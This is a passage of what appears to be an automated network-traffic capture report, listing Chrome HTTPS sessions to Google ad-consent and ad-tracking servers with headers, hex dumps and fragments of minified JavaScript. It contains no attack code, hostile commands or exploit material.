                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:40 UTC1378INData Raw: 57 7a 36 6f 6d 61 36 41 6c 4f 56 37 66 76 67 42 66 47 75 4b 6a 6a 4c 4f 46 5a 78 69 46 64 51 37 4b 65 4a 45 6f 57 4d 76 4d 36 45 79 42 46 6a 37 31 4e 53 77 56 67 55 64 76 4e 35 2b 54 71 63 6a 2b 53 33 37 41 39 34 48 37 47 45 64 37 52 38 7a 48 45 50 55 33 45 59 69 52 79 33 73 74 4e 45 64 78 4e 50 2f 42 75 59 79 31 79 4b 66 58 6c 45 45 38 62 58 6f 4c 75 6e 68 50 45 32 69 73 6a 47 57 2b 6c 66 57 50 44 64 49 31 5a 4a 4f 6b 38 6e 57 58 59 30 79 34 47 63 6f 69 77 65 7a 49 70 57 39 59 4c 63 34 46 66 46 38 7a 78 45 70 48 73 49 66 76 38 30 65 52 44 33 30 5a 79 38 56 61 32 71 34 75 57 74 44 67 34 48 4a 33 79 35 33 45 7a 38 63 7a 79 73 4a 71 56 32 69 74 4b 31 6d 65 71 78 67 65 6a 45 5a 71 4b 69 48 61 2f 54 62 53 54 2b 71 30 64 35 66 6c 37 73 76 57 57 39 64 4e 33 46
                                                                                                                                                                                                                                                                                                                      Data Ascii: Wz6oma6AlOV7fvgBfGuKjjLOFZxiFdQ7KeJEoWMvM6EyBFj71NSwVgUdvN5+Tqcj+S37A94H7GEd7R8zHEPU3EYiRy3stNEdxNP/BuYy1yKfXlEE8bXoLunhPE2isjGW+lfWPDdI1ZJOk8nWXY0y4GcoiwezIpW9YLc4FfF8zxEpHsIfv80eRD30Zy8Va2q4uWtDg4HJ3y53Ez8czysJqV2itK1meqxgejEZqKiHa/TbST+q0d5fl7svWW9dN3F
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:40 UTC1378INData Raw: 54 50 6b 63 56 67 36 31 37 64 53 48 79 38 68 6b 77 5a 35 41 4b 51 4e 61 38 4d 4e 5a 48 4b 73 61 72 44 77 54 38 42 51 32 56 52 6e 6f 53 6e 7a 53 47 42 6c 49 77 57 71 53 44 53 77 64 39 73 75 52 78 4d 39 63 51 2f 69 61 61 41 77 30 63 4d 6b 61 61 6a 6b 35 4a 4f 2b 34 73 76 47 35 75 51 4e 57 5a 41 68 65 62 41 38 6d 76 51 74 33 63 79 2b 61 75 53 67 6a 38 31 35 69 4f 56 4c 76 67 66 67 59 52 74 52 53 39 4e 2f 4b 7a 78 33 6e 68 65 75 54 53 78 6e 35 43 76 5a 4c 77 49 48 34 59 63 43 30 38 57 79 43 38 6e 35 7a 61 2b 54 53 31 4f 37 56 4f 61 36 4d 4d 42 56 73 49 6f 56 34 53 6f 38 61 41 63 4d 6a 4d 4e 6f 53 31 79 7a 4c 6d 2f 68 2f 54 47 64 78 2b 72 65 76 58 48 6d 48 6b 65 78 36 71 75 54 6b 4c 48 42 73 49 44 34 36 61 72 33 37 31 52 2f 4a 50 78 59 6e 76 78 4e 5a 38 32 4f
                                                                                                                                                                                                                                                                                                                      Data Ascii: TPkcVg617dSHy8hkwZ5AKQNa8MNZHKsarDwT8BQ2VRnoSnzSGBlIwWqSDSwd9suRxM9cQ/iaaAw0cMkaajk5JO+4svG5uQNWZAhebA8mvQt3cy+auSgj815iOVLvgfgYRtRS9N/Kzx3nheuTSxn5CvZLwIH4YcC08WyC8n5za+TS1O7VOa6MMBVsIoV4So8aAcMjMNoS1yzLm/h/TGdx+revXHmHkex6quTkLHBsID46ar371R/JPxYnvxNZ82O


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      75192.168.2.449975142.250.186.1744437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:40 UTC707OUTGET /f/AGSKWxUGL8xOsRaRP5PFyweqWIg8FLUl9Kj6bzVgUHc3lpUPZXC03phBxzVHNadhsFw6_SzGM2DcFUpr-aQhK_YmXtMeNnbqjjF6RvqMXAXnOY2uUuOqYG08zgv8dhrK8dARDb02qTW72dksb9BfH6gYBeExaqhirVZfYVfltGg-pJlYyh4-ZwVEQ-1y8o4E/_/googlempu.-scrollads.-banner-ad.=display_ad&_ads_iframe_ HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:40 UTC1913INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:40 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-pE_WqvRGBvbL9E99ffD9bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmJw15BikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhXg49kzp38km8GPB-n5GJY2k_ML45Py8kqLMpNKS_KK05LTU4tSistSieCMDIxNDA2MDPQOD-AIDAG-lP6Y"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:40 UTC60INData Raw: 33 36 0d 0a 77 69 6e 64 6f 77 5b 27 61 63 37 65 36 30 35 39 2d 31 34 32 35 2d 34 63 34 61 2d 39 30 32 33 2d 61 38 36 61 65 32 38 36 39 37 37 61 27 5d 20 3d 20 74 72 75 65 3b 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 36window['ac7e6059-1425-4c4a-9023-a86ae286977a'] = true;
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      76192.168.2.44999734.160.236.644437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:40 UTC534OUTGET /t/v2/sync?tagid=V2_4531&src.visitorid=CAESEF9fyWZJ8RKws_tJ1qGsPfA&google_push=AXcoOmR4H2VfDZB2KNV09WyzX4pnuC39urG3o7HFxj9XXoEoU4DPWDgCGNwoygQN3Mr9g8i_oN8U9qlhz3zZEvnu_wfoP_GQkTanpUQ&google_cver=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: odr.mookie1.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:40 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                      Content-Length: 42
                                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 19 Oct 2023 06:07:48 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "6530c7b4-2a"
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      77192.168.2.45000474.119.117.164437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:40 UTC665OUTGET /dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: widget.us.criteo.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      content-type: image/gif
                                                                                                                                                                                                                                                                                                                      date: Thu, 31 Oct 2024 18:19:40 GMT
                                                                                                                                                                                                                                                                                                                      server: Kestrel
                                                                                                                                                                                                                                                                                                                      cache-control: no-cache
                                                                                                                                                                                                                                                                                                                      expires: Thu, 31 Oct 2024 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                      x-errorlevel: 0
                                                                                                                                                                                                                                                                                                                      p3p: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
                                                                                                                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                      server-processing-duration-in-ticks: 191079
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; preload;
                                                                                                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC54INData Raw: 32 42 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 2BGIF89a!,D;0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      78192.168.2.449996142.250.186.1744437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:40 UTC524OUTGET /i/ca-pub-9495854422341365?href=https%3A%2F%2Ftrksyln.net%2FError&ers=2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:41 GMT
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ckFKApdnDaHHPuv3M9C-IQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw1pBikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhbg59k7p38kmsOHfc1sljaT8wvjk_LySosyk0pL8orTktNTi1KKy1KJ4IwMjE0MDYwM9A4P4AgMAP_g_pQ"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 36 65 64 65 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 7c 7c 20 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67
                                                                                                                                                                                                                                                                                                                      Data Ascii: 6edeif (typeof __googlefc === 'undefined' || typeof __googlefc.fcKernelManager === 'undefined') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{_._F_tog
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 61 28 62 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d
                                                                                                                                                                                                                                                                                                                      Data Ascii: e:function(){return fa(ba(this))}})}return a});fa=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a};_.q=function(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length==
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 66 28 67 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 74 68 69 73 2e 68 61 28 67 29 3b 65 6c 73 65 7b 61 3a 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 67 29 7b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 76 61 72 20 68 3d 67 21 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 3b 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 68 3d 21 30 3b 62 72 65 61 6b 20 61 3b 64 65 66 61 75 6c 74 3a 68 3d 21 31 7d 68 3f 74 68 69 73 2e 4b 28 67 29 3a 74 68 69 73 2e 41 28 67 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 4b 3d 0a 66 75 6e 63 74 69 6f 6e 28 67 29 7b 76 61 72 20 68 3d 76 6f 69 64 20 30 3b 74 72 79 7b 68 3d 67 2e 74 68 65 6e 7d 63 61 74 63 68 28 6b 29 7b 74 68 69 73 2e 75 28 6b 29 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 68 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74
                                                                                                                                                                                                                                                                                                                      Data Ascii: f(g instanceof e)this.ha(g);else{a:switch(typeof g){case "object":var h=g!=null;break a;case "function":h=!0;break a;default:h=!1}h?this.K(g):this.A(g)}};e.prototype.K=function(g){var h=void 0;try{h=g.then}catch(k){this.u(k);return}typeof h=="function"?t
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 3d 5f 2e 71 28 67 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 6b 2e 64 6f 6e 65 3f 63 28 5b 5d 29 3a 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 6d 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 77 28 78 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 44 29 7b 41 5b 78 5d 3d 44 3b 42 2d 2d 3b 42 3d 3d 30 26 26 6d 28 41 29 7d 7d 76 61 72 20 41 3d 5b 5d 2c 42 3d 30 3b 64 6f 20 41 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 42 2b 2b 2c 63 28 6b 2e 76 61 6c 75 65 29 2e 6d 62 28 77 28 41 2e 6c 65 6e 67 74 68 2d 31 29 2c 6e 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6b 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 0a 76 61 72 20 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c
                                                                                                                                                                                                                                                                                                                      Data Ascii: =_.q(g),k=h.next();return k.done?c([]):new e(function(m,n){function w(x){return function(D){A[x]=D;B--;B==0&&m(A)}}var A=[],B=0;do A.push(void 0),B++,c(k.value).mb(w(A.length-1),n),k=h.next();while(!k.done)})};return e});var ra=function(a,b,c){if(a==null
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 3b 72 65 74 75 72 6e 20 68 7d 29 3b 0a 70 28 22 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 5f 2e 71 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c 7c 6b 2e 67 65 74 28 7b 78 3a 34 7d 29 7c 7c 6b 2e 73 65 74 28 7b 78 3a 34 7d 2c 22 74 22 29 21 3d 6b 7c 7c
                                                                                                                                                                                                                                                                                                                      Data Ascii: ;return h});p("Map",function(a){if(function(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(_.q([[h,"s"]]));if(k.get(h)!="s"||k.size!=1||k.get({x:4})||k.set({x:4},"t")!=k||
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 2c 6b 29 7b 76 61 72 20 6d 3d 68 5b 31 5d 3b 72 65 74 75 72 6e 20 66 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6d 29 7b 66 6f 72 28 3b 6d 2e 68 65 61 64 21 3d 68 5b 31 5d 3b 29 6d 3d 6d 2e 71 61 3b 66 6f 72 28 3b 6d 2e 6e 65 78 74 21 3d 6d 2e 68 65 61 64 3b 29 72 65 74 75 72 6e 20 6d 3d 0a 6d 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6d 29 7d 3b 6d 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 7b 7d 3b 72 65 74 75 72 6e 20 68 2e 71 61 3d 68 2e 6e 65 78 74 3d 68 2e 68 65 61 64 3d 68 7d 2c 67 3d 30 3b 72 65 74 75 72 6e 20 63 7d 29 3b 0a 70 28 22 53 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66
                                                                                                                                                                                                                                                                                                                      Data Ascii: ,k){var m=h[1];return fa(function(){if(m){for(;m.head!=h[1];)m=m.qa;for(;m.next!=m.head;)return m=m.next,{done:!1,value:k(m)};m=null}return{done:!0,value:void 0}})},f=function(){var h={};return h.qa=h.next=h.head=h},g=0;return c});p("Set",function(a){if
